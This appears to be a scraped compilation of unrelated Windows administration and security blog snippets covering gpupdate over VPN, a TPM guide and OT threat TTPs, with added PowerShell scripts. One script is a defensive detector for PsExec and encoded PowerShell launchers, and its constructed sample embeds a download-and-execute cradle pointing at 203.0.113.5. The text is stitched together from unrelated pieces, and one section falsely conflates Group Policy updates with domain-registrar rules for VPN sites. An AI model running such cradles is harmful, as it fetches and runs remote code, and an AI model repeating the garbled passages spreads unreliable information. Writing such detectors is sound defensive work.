Setting the time zone on your Windows RDP server using PowerShell is an essential task for maintaining accurate timekeeping and ensuring the smooth operation of your server environment. Whether you’re managing a free RDP server or a paid service, the steps outlined in this guide will help you configure the time zone correctly. By following this step-by-step guide, you can ensure that your RDP server is always running at the correct time, providing a better experience for all users.
PowerShell Kill a Process from the Command Line
Killing processes in Windows has long been the easiest way to deal with unresponsive programs that won’t close using the usual means by clicking the “X” in the top right-hand corner. Generally speaking, using the Windows Task Manager is the first method most use to find and close processes that are not responding. However, using the command line, we can leverage command prompt commands and…
Day 11 at BCS
More work on the PowerShell script; good progress. Figured out remote command execution and filtering the certs. Was also processing the phishing and spam for the day for the first time.
does gpupdate work over vpn
GPUpdate command VPN functionality
The 'GPUpdate' command in a VPN (Virtual Private Network) environment plays a crucial role in ensuring that the client computers receive the latest Group Policy settings from the domain controller. When a VPN connection is established, it is important that all client machines are kept up to date with the latest policies to maintain security and compliance standards.
By utilizing the 'GPUpdate' command, network administrators can manually trigger a refresh of the Group Policy settings on a client machine, ensuring that any recent changes or updates are applied promptly. This command proves to be particularly useful in VPN scenarios where clients may not always be connected to the corporate network to receive automatic updates.
To execute the 'GPUpdate' command in a VPN environment, users typically open the Command Prompt window and enter the command along with the necessary parameters. This initiates a request to the domain controller to retrieve the latest Group Policy settings, including security policies, software deployment schedules, and other configurations specified by the network administrator.
Overall, the 'GPUpdate' command serves as a valuable tool for maintaining network security and ensuring consistency across client machines in a VPN setup. By proactively running this command, organizations can mitigate potential security risks and issues arising from outdated or conflicting Group Policy settings, ultimately enhancing the overall security posture of the network.
GPUpdate command remote access
The GPUpdate command is a powerful tool used in the Windows operating system for updating Group Policy settings on a local or remote computer. With the GPUpdate command, system administrators can ensure that any changes made to Group Policy Objects (GPOs) are applied immediately without the need for a system reboot.
One of the key features of the GPUpdate command is its ability to be executed remotely, allowing administrators to update Group Policy settings on multiple computers from a central location. This remote access capability streamlines the process of managing Group Policy settings across an entire network, saving time and effort for IT professionals.
To use the GPUpdate command remotely, administrators can utilize tools such as PowerShell or Remote Desktop to connect to the target computer and execute the command. By running GPUpdate remotely, administrators can ensure that all computers on the network receive the latest Group Policy settings promptly, maintaining consistency and security across the organization.
It is important to note that the GPUpdate command should be used with caution, as applying incorrect Group Policy settings can have unintended consequences on system behavior. Administrators should always test changes in a controlled environment before deploying them to production systems to avoid potential disruptions.
In conclusion, the GPUpdate command's remote access functionality provides system administrators with a convenient and efficient way to update Group Policy settings across multiple computers in a network. By leveraging this powerful tool, IT professionals can streamline the management of Group Policy Objects and ensure that all systems remain secure and compliant with organizational policies.
GPUpdate not working VPN connection
If you're encountering issues with GPUpdate not functioning properly while connected to a VPN, several factors could be at play. GPUpdate, or Group Policy Update, is a crucial tool in Windows environments for applying group policies across networks. When it fails to work over a VPN connection, troubleshooting becomes essential.
Firstly, verify your VPN connection stability. Fluctuating or unreliable connections can disrupt the communication between your device and the domain controller, leading to GPUpdate failures. Try reconnecting to the VPN or switching to a more stable network if possible.
Secondly, check if the VPN firewall or security settings are blocking the necessary communication ports for GPUpdate. Ensure that the required ports (such as TCP port 445 for SMB communication) are open and accessible through the VPN connection.
Additionally, consider the DNS resolution settings. GPUpdate relies on proper DNS resolution to locate domain controllers and apply group policies. If DNS resolution is not functioning correctly over the VPN, GPUpdate may fail. Ensure that your VPN settings are configured to use the correct DNS servers provided by your network administrator.
Furthermore, investigate any potential conflicts between the VPN client software and Group Policy settings. Certain VPN configurations or client software may interfere with the execution of GPUpdate. Adjusting VPN settings or policies to exclude conflicts with Group Policy operations can help resolve this issue.
Lastly, consult with your IT department or network administrator for further assistance. They can provide insight into specific network configurations or policies that may affect GPUpdate over VPN connections and offer tailored solutions to address the issue.
Domain policy update VPN
Attention all users of VPN services! A recent domain policy update regarding VPNs may impact your online browsing experience. It is crucial to stay informed about these changes to ensure secure and uninterrupted access to your preferred VPN services.
In light of increasing cybersecurity threats and data privacy concerns, many domain registrars are implementing stricter policies for websites offering VPN services. These policies aim to enhance user safety and prevent misuse of VPNs for illegal activities. As a result, VPN service providers must comply with these updated domain policies to maintain their online presence.
Users of VPN services should be aware of these domain policy updates to avoid any disruptions in their VPN access. It is recommended to regularly check for any notifications or alerts from your VPN provider regarding changes in domain policies. Failure to adhere to these updated policies may result in domain suspension or restrictions, leading to potential service interruptions.
To ensure smooth and continuous VPN usage, users are advised to review and understand the domain policy updates issued by their VPN service providers. By staying informed and compliant with these policies, users can safeguard their online privacy and security while enjoying the benefits of VPN services.
In conclusion, staying informed about domain policy updates related to VPN services is essential for maintaining secure and reliable online browsing. By understanding and adhering to these policies, users can continue to enjoy the advantages of VPN technology without any disruptions. Stay updated, stay secure!
Troubleshoot GPUpdate VPN conflict
When using VPN (Virtual Private Network) services, users may encounter conflicts with the GPUpdate utility, which is used to refresh Group Policy settings on Windows systems. These conflicts can arise due to various reasons and can hinder the proper functioning of both the VPN and GPUpdate. Here are some troubleshooting steps to resolve GPUpdate VPN conflicts:
Check VPN Configuration: Ensure that the VPN configuration does not interfere with the network settings required for GPUpdate. Some VPNs may block certain ports or protocols used by GPUpdate, causing conflicts.
Temporarily Disable VPN: Temporarily disable the VPN connection before running GPUpdate. This allows GPUpdate to communicate directly with the domain controller without any interference from the VPN.
Modify VPN Settings: If possible, modify the VPN settings to allow traffic related to GPUpdate. This may involve configuring exceptions or whitelisting specific IP addresses or domains used by the domain controller.
Update VPN Client: Ensure that the VPN client software is up to date. Sometimes, outdated VPN clients may have compatibility issues with GPUpdate or other system components.
Check Firewall Settings: Verify that the firewall settings on the local machine and the network firewall do not block the necessary traffic for GPUpdate. Adjust firewall rules if needed to allow GPUpdate traffic.
Review Group Policy Settings: Review the Group Policy settings to ensure that there are no conflicting policies that could be causing issues with GPUpdate. Sometimes, conflicting policies may prevent GPUpdate from applying changes successfully.
Consult VPN Provider: If the issue persists, contact the VPN service provider for further assistance. They may have specific recommendations or solutions tailored to their VPN software.
By following these troubleshooting steps, users can effectively resolve conflicts between GPUpdate and VPN services, ensuring smooth operation and proper application of Group Policy settings.
TPM: A Guide to Understanding Your Computer’s Security Chip
What is Trusted Platform Module (TPM)
A Trusted Platform Module (TPM) is a secure cryptoprocessor chip on your computer’s motherboard.
First Contact: TPM for Windows
The BitLocker drive encryption, the Virtual Smart Card features, and the Crypto Provider are among the security components of the Microsoft Windows operating system that depend on TPM-based capabilities. In fact, Trusted Platform Module 2.0 needs to be activated in ALL desktop and server variants of Windows 10 and 11. By using remote attestation in conjunction with the system’s Trusted Platform Module to allow Measured Boot, the configuration of the system is protected from undetectable threats like rootkits.
On a Windows machine, you can quickly verify some Trusted Platform Module details by navigating to the Security Devices area of the Device Manager screen.
Now let’s engage with it. Open a terminal window and extract some basic system data. Windows ships numerous PowerShell cmdlets that can be used right away.
Get-Tpm retrieves the following data from the module:
This information can also be used to deduce some details about the underlying system. For instance, if the platform is equipped with and using Intel Platform Trust Technology (PTT), “Intel” will appear in the manufacturer field. In the output shown here, a Trusted Platform Module from STMicroelectronics (STM) is in use.
To use the Trusted Platform Module from an application, you communicate with the Windows Core Security features, namely the TPM Base Services (TBS) software component and its API. Microsoft offers tools and wrappers that speed up the integration of these processes.
We will examine these next.
Linux-based TPM First Contact
Working with keys securely across any TPM 2.0 compatible module is made feasible by a set of standardised commands and libraries that enable the use of TPMs for key loading and storage in Linux.
At a high level, you can check whether a TPM is present by searching the kernel log with the following command: dmesg | grep -i tpm
Here is a step-by-step guide to several fundamental Linux system interactions. The command syntax below follows tpm2-tools 4.x and later, where each tool is named tpm2_<command>; the older 3.x releases use different option letters.

Required conditions: the target machine must have a TPM 2.0 chip, and the TPM 2.0 software must be installed. These packages differ per Linux distribution; the tpm2-tools and tpm2-tss packages are popular.

Initialise the TPM: initialise the TPM before using it:
tpm2_startup -c

Establish an application key: create a key that is unique to your application and that you wish to keep in the TPM. You can use a software library like OpenSSL or a Trusted Platform Module library like tpm2-tools to generate this key. The following is one method of generating an RSA keypair with OpenSSL:
openssl genpkey -algorithm RSA -out appkey.pem

Load the key into the TPM: to load your application-specific key into the TPM, use the TPM 2.0 tools. For this, you’ll usually use the tpm2_load command. Note that tpm2_load expects a TPM-format public/private pair (appkey.pub and appkey.priv) wrapped under a parent key, not the PEM file directly; an externally generated PEM key is first wrapped under a parent (primary) key with tpm2_import, which produces that pair. With parent.ctx holding the parent key’s context:
tpm2_load -C parent.ctx -u appkey.pub -r appkey.priv -c context.out
This command loads the key into the TPM and saves the key’s context in the context.out file. This context is necessary for using the key later on.

Apply the TPM-resident key: you can use these commands, or libraries such as tpm2-tss, to execute cryptographic operations on the TPM-resident key when your programme needs it. To sign data using the TPM key, for instance, run:
tpm2_sign -c context.out -g sha256 -o signature.bin data.txt
Using the TPM-resident key, this command signs data.txt and stores the signature in signature.bin.

Unload the key (optional): you can use tpm2_flushcontext to unload the TPM-resident key if you no longer require it:
tpm2_flushcontext context.out
This releases the key’s associated TPM resources.

Shutdown and cleanup (optional): you can use the tpm2_shutdown command to terminate the Trusted Platform Module session once your programme has finished using it.

Analysing TPM 2.0 thoroughly
Advancements in Computer Security
Trusted Platform Module (TPM) 2.0 hardware boosts computer security. As a secure cryptoprocessor, it protects your system and its encryption keys.
Essential Features:
Cryptographic Key Management: TPM 2.0 securely produces, stores, and uses keys. Data encryption, digital signatures, and secure communication require these keys. TPM 2.0’s hardware isolation makes key theft and tampering much harder than with software-based systems.
Platform Integrity Validation: Trusted Platform Module 2.0 monitors firmware and other critical software. It looks for any unauthorised changes that might point to malware or efforts at tampering. TPM 2.0 can protect your data by stopping the system from booting if something suspect is found.
Platform Attestation: The firmware and software of your system can be reported on using Trusted Platform Module 2.0. Other security measures or reliable organisations can use these reports, known as attestations, to confirm the integrity of the system. This is useful for secure boot environments and for assessing a system’s health prior to allowing access to resources that are sensitive.
Benefits of TPM 2.0:
BitLocker Drive Encryption: TPM 2.0 securely holds the encryption keys, strengthening BitLocker and other functions. This makes data access tougher for unauthorised parties, even if they get hold of your device.
Enhanced Platform Security: Your system will boot with authentic, unaltered firmware and software thanks to the platform integrity checks. This lessens the chance that malware will compromise your system remotely.
More Robust User Authentication: Trusted Platform Module 2.0 can be paired with Windows Hello and other comparable technologies to provide more reliable two-factor authentication. By requiring a physical factor in addition to a password, like a fingerprint or facial recognition, this strengthens security.
TPM 2.0 and Windows 11:
Microsoft says Windows 11 needs Trusted Platform Module 2.0. This shows how crucial hardware-based security capabilities are becoming in the battle against more complex assaults. The good news is that TPM 2.0 functionality is probably pre-installed on the majority of PCs made in the last few years. It may, however, be inactive by default in the BIOS settings.
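The Windows-side checks the article walks through (Get-Tpm, the manufacturer field that reveals Intel PTT, and the TPM 2.0 requirement for Windows 11) can be combined into one readiness report. This is an added example, not code from the article; Get-TpmReadiness is a hypothetical helper name and the vendor id table is an assumption based on common TCG vendor id strings.

```powershell
# Added example (not from the original article). Get-TpmReadiness is a hypothetical name.
# Run from an elevated PowerShell prompt: Get-Tpm (TrustedPlatformModule module) needs administrator rights.
function Get-TpmReadiness {
    [CmdletBinding()]
    param()

    # Presence, readiness and manufacturer details, as shown by Get-Tpm in the article.
    $tpm = Get-Tpm

    # The Win32_Tpm CIM class carries the spec version as a string such as "2.0, 0, 1.38";
    # the first comma-separated field is the TPM specification family.
    $cim = Get-CimInstance -Namespace 'root/cimv2/Security/MicrosoftTpm' -ClassName Win32_Tpm -ErrorAction SilentlyContinue
    $specVersion = if ($cim -and $cim.SpecVersion) { ($cim.SpecVersion -split ',')[0].Trim() } else { 'unknown' }

    # Four-character manufacturer id text stored in the module (assumed table; unknown ids pass through).
    # Intel PTT reports INTC, which is what the article's "Intel in the manufacturer field" refers to.
    $vendors = @{
        'INTC' = 'Intel (Platform Trust Technology firmware TPM)'
        'STM'  = 'STMicroelectronics (discrete TPM)'
        'IFX'  = 'Infineon (discrete TPM)'
        'AMD'  = 'AMD (firmware TPM)'
        'MSFT' = 'Microsoft (Hyper-V virtual TPM)'
    }
    $idKey  = ([string]$tpm.ManufacturerIdTxt).Trim()
    $vendor = if ($vendors.ContainsKey($idKey)) { $vendors[$idKey] } else { "unrecognised manufacturer id '$idKey'" }

    # Collect every reason the machine would miss the Windows 11 requirement, not just the first one.
    $problems = @()
    if (-not $tpm.TpmPresent) {
        $problems += 'no TPM detected (it may be switched off in the BIOS/UEFI settings)'
    } elseif (-not $tpm.TpmReady) {
        $problems += 'TPM present but not ready (not enabled, activated or provisioned)'
    }
    if ($specVersion -ne '2.0') {
        $problems += "spec version is '$specVersion', not 2.0"
    }

    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        TpmPresent      = [bool]$tpm.TpmPresent
        TpmReady        = [bool]$tpm.TpmReady
        ManufacturerId  = $idKey
        Vendor          = $vendor
        FirmwareVersion = $tpm.ManufacturerVersion
        SpecVersion     = $specVersion
        IsIntelPtt      = ($idKey -eq 'INTC')
        MeetsWindows11  = ($problems.Count -eq 0)
        Problems        = $problems
    }
}

# Usage:
# Get-TpmReadiness | Format-List
```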
Beyond the Fundamentals: Flexibility: TPM 2.0 takes a “library” approach, in contrast to its predecessor. This implies that Trusted Platform Module 2.0 features can be selected by manufacturers based on what best meets their device and security requirements. Wider acceptance across multiple platforms from laptops to embedded systems is made possible by this versatility.
Future-Proofing: Expansion is a key design principle of TPM 2.0. As security risks evolve, it supports the installation of new functions and algorithms. This guarantees that Trusted Platform Module 2.0 will continue to be applicable and useful when new security threats arise.
Read more on Govindhtech.com
does group policy update over vpn
Group Policy update process
Group Policy is a vital component in the management of Windows-based networks, allowing administrators to enforce settings and configurations across multiple machines efficiently. However, ensuring that these policies are up to date across all networked devices is crucial for maintaining security and compliance standards. The Group Policy update process facilitates this by ensuring that policy changes and updates are propagated throughout the network effectively.
The Group Policy update process typically occurs automatically in Windows environments, with machines periodically checking for updates based on a predetermined schedule. By default, this update interval is every 90 minutes, with a randomized offset of up to 30 minutes to prevent all machines from updating simultaneously and overwhelming the network.
When a Group Policy update is triggered, the client machine contacts a domain controller to retrieve the latest policies. This process involves several steps, including determining which policies are applicable to the machine based on its membership in Active Directory groups, retrieving the policies from the appropriate Group Policy Objects (GPOs), and applying them to the system.
Administrators can also force a Group Policy update manually using the "gpupdate" command, which triggers an immediate refresh of policy settings on the local machine. This can be useful when changes need to be applied immediately, such as in the case of security updates or configuration changes.
In addition to regular updates, Group Policy settings can also be enforced or disabled at specific intervals using tools like the Group Policy Management Console (GPMC) or PowerShell commands, giving administrators fine-grained control over policy deployment.
In conclusion, the Group Policy update process plays a vital role in ensuring that networked devices remain compliant with organizational standards and security requirements. By automating the distribution of policy changes and updates, administrators can maintain a secure and well-managed IT environment.
VPN connectivity for Group Policy
Enhancing Group Policy Security with VPN Connectivity
In today's digital landscape, where remote work is increasingly prevalent, securing network connectivity is paramount for organizations. Group Policy, a feature of Microsoft Windows, offers centralized management and configuration of computer and user settings. However, ensuring the security of Group Policy communications, especially across distributed networks, requires robust measures. This is where Virtual Private Network (VPN) connectivity comes into play.
VPNs establish secure, encrypted connections over public networks, such as the internet, enabling remote users to access resources as if they were directly connected to the private network. By integrating VPN connectivity with Group Policy, organizations can extend the reach of their security policies to remote endpoints, enhancing overall network security.
One key benefit of using VPNs with Group Policy is the ability to enforce consistent security settings across all endpoints, regardless of their location. This ensures that devices connecting from remote locations adhere to the same security standards as those within the corporate network, mitigating the risk of unauthorized access and data breaches.
Additionally, VPNs provide an extra layer of encryption for Group Policy communications, safeguarding sensitive information from potential interception or tampering by malicious actors. This is especially crucial when transmitting sensitive data, such as login credentials or configuration settings, over untrusted networks.
Moreover, VPNs offer granular control over access permissions, allowing administrators to define which users or groups can connect to the network remotely and what resources they can access. This ensures that only authorized personnel can modify Group Policy settings, reducing the risk of unauthorized changes that could compromise network security.
In conclusion, integrating VPN connectivity with Group Policy enhances the security and manageability of distributed networks. By extending security policies to remote endpoints and encrypting communications, organizations can maintain a secure computing environment while accommodating the growing trend of remote work.
Group Policy settings synchronization
Group Policy settings synchronization is a crucial aspect of managing networks effectively within organizations. It involves ensuring that all the Group Policy settings, which define how certain computer settings and configurations are applied, are synchronized across all devices within a network. This synchronization process helps in maintaining consistency and uniformity in the network environment, ensuring that all devices adhere to the same security protocols and operational standards.
By synchronizing Group Policy settings, administrators can centrally manage and enforce security policies, user settings, software deployment configurations, and other important parameters for all devices in the network. This simplifies the administration process, reduces the likelihood of configuration errors, and enhances overall network security.
One of the key advantages of Group Policy settings synchronization is its ability to streamline the management of a large number of devices efficiently. This centralized approach enables administrators to make changes to Group Policy settings in one location and have those changes automatically applied to all connected devices. This not only saves time and effort but also helps in maintaining a standardized and secure network environment.
Additionally, Group Policy settings synchronization plays a vital role in ensuring compliance with regulatory requirements and internal security policies. By enforcing consistent settings across all network devices, organizations can minimize security vulnerabilities and mitigate potential risks associated with non-compliance.
In conclusion, Group Policy settings synchronization is indispensable for organizations looking to establish a well-managed, secure, and efficient network environment. By ensuring that all devices are consistently configured and updated according to the defined policies, administrators can effectively safeguard their network infrastructure and data assets.
Group Policy application over VPN
Group Policy application over VPN is a critical aspect of network management for organizations with remote or distributed workforce. Group Policy allows administrators to enforce specific settings, restrictions, and configurations across all devices connected to the network. However, ensuring the seamless application of Group Policies to devices accessing the network via VPN presents unique challenges.
One of the primary challenges is ensuring consistent connectivity between the remote device and the domain controller responsible for Group Policy administration. VPN connections rely on stable network connections, which may not always be guaranteed, especially when users are accessing the network from diverse locations with varying internet quality.
To address this challenge, administrators can implement strategies such as optimizing VPN configurations for reliability and performance. This may involve using VPN protocols that are known for their stability, implementing redundant VPN gateways, or deploying technologies like SD-WAN to prioritize VPN traffic and mitigate latency issues.
Another consideration is latency. Policy processing involves a series of round trips to the domain controller (DC location, LDAP queries for the list of GPOs and their version numbers, SMB reads of the policy files in SYSVOL), so a high-latency link stretches each refresh and can push it past its timeouts. Administrators can reduce the impact by consolidating policies so fewer GPOs are linked, and by enabling Group Policy caching, which stores the last-applied policy locally so that synchronous foreground processing at boot and logon can use the cached copy instead of waiting on the domain controller. Be aware of slow link detection as well: if the client estimates the link to the domain controller at under 500 kbps (the default threshold), it still applies security and registry policy but skips bandwidth-heavy extensions such as software installation and folder redirection, which is a common reason a policy appears not to apply over VPN.
Furthermore, security considerations are paramount when applying Group Policies over VPN. Policy retrieval itself runs over Kerberos-authenticated LDAP and SMB, but the tunnel is what keeps that traffic, and the device, off the open Internet. Administrators should require an encrypted, authenticated tunnel and confirm that split-tunnel rules still route domain controller traffic through it, so that policy data cannot be intercepted or tampered with on untrusted networks.
In conclusion, Group Policy application over VPN requires careful planning and implementation to ensure consistent connectivity, optimal performance, and robust security. By addressing challenges such as network reliability, latency, and security, organizations can effectively manage and enforce Group Policies across their remote workforce.
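The checks a practitioner runs to tell a connectivity problem from a slow-link decision, as an added PowerShell example that is not part of the original post. It assumes a domain-joined Windows client with the VPN tunnel already up and an elevated session; the domain controller is found through the DC locator SRV record in DNS, and the two Group Policy operational events it relies on are 1129 (no connectivity to a domain controller) and 5314 (the bandwidth estimate and slow-link verdict). Hostnames and thresholds are not assumed beyond the Windows defaults.

```powershell
# Added example, not part of the original post. Separates "the client cannot reach a
# domain controller" from "the client reached one but classed the link as slow" for a
# VPN-connected machine. Assumes a domain-joined Windows client, tunnel already up,
# elevated session. Event IDs used: 1129 (no DC connectivity), 5314 (link-speed estimate).

function Get-GroupPolicyDomainController {
    # Find a DC the way the Group Policy client does: the DC locator SRV record in DNS.
    # If this fails over VPN, the tunnel is not handing out internal DNS servers.
    $domain = $env:USERDNSDOMAIN
    if (-not $domain) { $domain = (Get-CimInstance Win32_ComputerSystem).Domain }

    $srv = Resolve-DnsName -Name "_ldap._tcp.dc._msdcs.$domain" -Type SRV -ErrorAction Stop |
        Where-Object { $_.Type -eq 'SRV' } |
        Sort-Object Priority, { -$_.Weight } |
        Select-Object -First 1
    if (-not $srv) { throw "No DC locator record for $domain; check the VPN's DNS assignment." }
    return $srv.NameTarget
}

function Test-GroupPolicyConnectivity {
    param([Parameter(Mandatory)][string]$DomainController)

    # Policy processing needs all three: Kerberos for authentication, LDAP to enumerate
    # GPOs and their version numbers, SMB to read the policy files from SYSVOL.
    $ports = [ordered]@{ Kerberos = 88; LDAP = 389; SMB = 445 }
    foreach ($name in $ports.Keys) {
        $ok = Test-NetConnection -ComputerName $DomainController -Port $ports[$name] `
                                 -InformationLevel Quiet -WarningAction SilentlyContinue
        [pscustomobject]@{ Service = $name; Port = $ports[$name]; Reachable = $ok }
    }
}

function Get-GroupPolicyProcessingStatus {
    param([int]$LookbackMinutes = 30)

    $log   = 'Microsoft-Windows-GroupPolicy/Operational'
    $since = (Get-Date).AddMinutes(-$LookbackMinutes)

    # Errors and warnings (Level 2 and 3). 1129 is the one logged when a refresh fired
    # before the tunnel came up: "lack of network connectivity to a domain controller".
    $problems = Get-WinEvent -FilterHashtable @{ LogName = $log; Level = 2, 3; StartTime = $since } `
                             -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message

    # 5314 records the estimated bandwidth and whether the link was treated as slow.
    # Below the default 500 kbps threshold the client still applies security and
    # registry policy but skips software installation and folder redirection.
    $link = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 5314; StartTime = $since } `
                         -MaxEvents 1 -ErrorAction SilentlyContinue
    $linkText = 'no link-speed event in window'
    if ($link) { $linkText = $link.Message }

    [pscustomobject]@{
        NoDcConnectivity = @($problems | Where-Object Id -eq 1129).Count -gt 0
        Problems         = $problems
        LinkDetection    = $linkText
    }
}

$dc = Get-GroupPolicyDomainController
"Domain controller selected: $dc"

$reach = Test-GroupPolicyConnectivity -DomainController $dc
$reach | Format-Table -AutoSize
if ($reach | Where-Object { -not $_.Reachable }) {
    Write-Warning 'A port policy processing needs is blocked; check split-tunnel routes and firewall rules before blaming Group Policy.'
}

# Refresh now that the tunnel is up, then read back what the client logged about it.
gpupdate /target:computer /force | Out-Null
$status = Get-GroupPolicyProcessingStatus -LookbackMinutes 30
$status.Problems | Format-Table -AutoSize
"Link detection: $($status.LinkDetection)"
if ($status.NoDcConnectivity) { Write-Warning 'Event 1129 logged: a policy refresh ran without a reachable DC.' }
```

Run it once with the VPN down and once with it up: the first run should show unreachable ports and, after the forced refresh, an 1129 event; the second should show all ports reachable and a 5314 message stating the estimated bandwidth. If everything is reachable but a software installation or folder redirection policy still does not apply, the 5314 verdict is the first thing to read.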
Remote network policy updates
Remote network policy updates are crucial for businesses operating in today's digital world. With remote work becoming more common, ensuring that network policies are up to date is essential to maintaining a secure and efficient network infrastructure.
Updating network policies remotely involves making changes to the rules and procedures that govern network access and usage. This can include updating security protocols, access controls, and bandwidth management rules. By implementing timely updates, organizations can mitigate security risks, ensure compliance with industry regulations, and improve network performance.
One of the key benefits of remote network policy updates is the ability to quickly respond to emerging threats and vulnerabilities. With cyber threats constantly evolving, businesses need to stay proactive in updating their network policies to protect sensitive data and prevent unauthorized access.
Furthermore, remote network policy updates allow organizations to adapt to changing business needs and technological advancements. As businesses scale and adopt new technologies, network policies may need to be updated to accommodate these changes.
To effectively manage remote network policy updates, businesses should implement a centralized policy management solution that allows for seamless deployment and monitoring of policy changes. Automation tools can also help streamline the update process and ensure consistency across the network.
In conclusion, remote network policy updates are essential for maintaining a secure and efficient network infrastructure in today's digital landscape. By staying proactive and implementing timely updates, businesses can safeguard their data, optimize network performance, and adapt to evolving business requirements.
Tactics Techniques and Procedures Cyber Security
The estimated share of published OT vulnerabilities that are actually exploitable varies. A survey by researchers from Virginia Tech and other research institutes estimates that “5.5% of all 100,000+ vulnerabilities contained in the National Vulnerability Database have been exploited in the wild”.
The European Union Agency for Cybersecurity (ENISA) claims that “at least 8.65% of vulnerabilities are exploitable… this number is expected to be higher due to zero-day exploits and the incompleteness of the datasets”. It should be noted that this figure refers to both OT and IT vulnerabilities.
Tactics Techniques and Procedures
Many 2019 reports point to a rise in masquerading (disguising malicious files, processes or accounts as legitimate ones), used for example to steal logon IDs and passwords or to find security gaps in programs. In addition, we have also observed a rise in the exploitation of the SMB protocol.
According to Crowdstrike’s report, there has been a rise in malware-free attacks. Malware-free attacks are attacks where the initial tactic did not result in a file or file fragment being written to disk, for example attacks where code executes from memory or where stolen credentials are used for remote login using known tools.
“Hands-on-keyboard” techniques have also been on the rise, including command-line interface attacks, PowerShell and credential theft, credential dumping, and account discovery.
The hacking “industry” is transitioning to an outsourced service model. This model includes Ransomware-as-a-service (RaaS) (e.g. LockerGoga that attacked ICS manufacturing facilities), Malware-as-a-service (MaaS), and Download-as-a-Service (DaaS).
Finally, there has been prolific use of network shell commands, RDP, RATs, Active Directory scanners, network protocol vulnerability exploitation, insecure DNS manipulation (DNS tunneling, anchoring), and remote code execution (RCE).
2019 OT Advisories and Increase in Attacks
All the 2019 reports I have read were unequivocal about the rise of attacks on the ICS sector. Moreover, in a recent survey of OT leaders, 77% of respondents said they had experienced a malware intrusion in the past year, and half had experienced between three and ten.
The Tactics, Techniques and Procedures (TTPs) aimed at the ICS environment that made the headlines were those of BitPaymer, Ryuk, and LockerGoga.
BitPaymer – BitPaymer is a Ransomware that collects data such as Active Directory (AD) credentials, private user data and lists of all computers on the network. BitPaymer uses the PowerShell Empire tool for lateral movement in the network.
Ryuk – Ryuk is a ransomware that resembles and is probably somewhat based on BitPaymer. It uses TrickBot modules (e.g. pwgrab) to execute credentials theft, and PowerShell Empire traffic for reconnaissance and lateral movement.
LockerGoga – uses PsExec (a Sysinternals system administration tool) for reconnaissance and lateral movement in the network. Since LockerGoga neither gives the victims a chance to recover the files nor specifically asks for payment, it is likely intended to disrupt operations.
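A triage filter for two of the TTPs named above, PsExec service installation and encoded PowerShell launchers of the kind Empire produces, as an added PowerShell example that is not part of the original post. The event records in it are constructed for the demonstration (the hostnames, the 203.0.113.5 address and the command lines are made up); on a live host the same detector runs over Get-WinEvent output flattened by the helper included here. It assumes process creation auditing with command-line logging is enabled, otherwise event 4688 carries no CommandLine field.

```powershell
# Added example, not part of the original post. Flags two lateral-movement TTPs from
# Windows event records: PsExec service installation (System log, event 7045) and
# encoded PowerShell launchers (Security log, event 4688 with a command line).
# The sample events at the bottom are constructed for the demo.

function ConvertFrom-WinEventRecord {
    # Flatten a live Get-WinEvent record into the fields the detector reads.
    # Works for both logs: 7045 carries ServiceName/ImagePath, 4688 carries CommandLine.
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $xml  = [xml]$Record.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Id          = $Record.Id
            TimeCreated = $Record.TimeCreated
            MachineName = $Record.MachineName
            ServiceName = $data['ServiceName']
            ImagePath   = $data['ImagePath']
            CommandLine = $data['CommandLine']
        }
    }
}

function Get-LateralMovementIndicators {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        switch ($e.Id) {
            7045 {
                # PsExec copies PSEXESVC.exe to ADMIN$ on the target and registers it as a
                # service. A renamed service still points at the same binary, so check both.
                if ($e.ServiceName -match '(?i)PSEXESVC' -or $e.ImagePath -match '(?i)\\PSEXESVC\.exe') {
                    [pscustomobject]@{
                        Time = $e.TimeCreated; Host = $e.MachineName
                        Indicator = 'PsExec service installed'; Detail = $e.ImagePath
                    }
                }
            }
            4688 {
                # Empire-style launchers run powershell with -enc/-EncodedCommand and a
                # base64 blob; PowerShell accepts any unambiguous prefix of the parameter name.
                if ($e.CommandLine -match '(?i)powershell.*\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
                    try {
                        # -EncodedCommand is UTF-16LE, not UTF-8.
                        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
                    } catch {
                        $decoded = '<not valid base64>'
                    }
                    [pscustomobject]@{
                        Time = $e.TimeCreated; Host = $e.MachineName
                        Indicator = 'Encoded PowerShell launcher'; Detail = $decoded
                    }
                }
            }
        }
    }
}

# Constructed sample events (not real telemetry). The base64 is generated here so the
# decode step above has something genuine to work on.
$fakePayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/launcher')"))

$sampleEvents = @(
    [pscustomobject]@{ Id = 7045; TimeCreated = Get-Date '2019-06-01 02:14:07'; MachineName = 'hmi-01.plant.example'
                       ServiceName = 'PSEXESVC'; ImagePath = '%SystemRoot%\PSEXESVC.exe'; CommandLine = $null }
    [pscustomobject]@{ Id = 7045; TimeCreated = Get-Date '2019-06-01 02:20:11'; MachineName = 'eng-ws-04.plant.example'
                       ServiceName = 'Spooler'; ImagePath = 'C:\Windows\System32\spoolsv.exe'; CommandLine = $null }
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date '2019-06-01 02:15:30'; MachineName = 'hmi-01.plant.example'
                       ServiceName = $null; ImagePath = $null
                       CommandLine = "powershell.exe -noP -sta -w 1 -enc $fakePayload" }
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date '2019-06-01 02:16:02'; MachineName = 'hmi-01.plant.example'
                       ServiceName = $null; ImagePath = $null
                       CommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1' }
)

Get-LateralMovementIndicators -Events $sampleEvents | Format-Table -AutoSize
```

Against the constructed input the filter reports the PSEXESVC installation on hmi-01 and the decoded download cradle from the encoded launcher, and stays quiet on the Spooler service and the plain scripted backup. On a live host, feed it `Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } | ConvertFrom-WinEventRecord` and the equivalent Security query for 4688; the `-ExecutionPolicy` case is there because `-e` is also a valid prefix of that parameter, and the regex only fires when the token is followed by whitespace and a base64 blob.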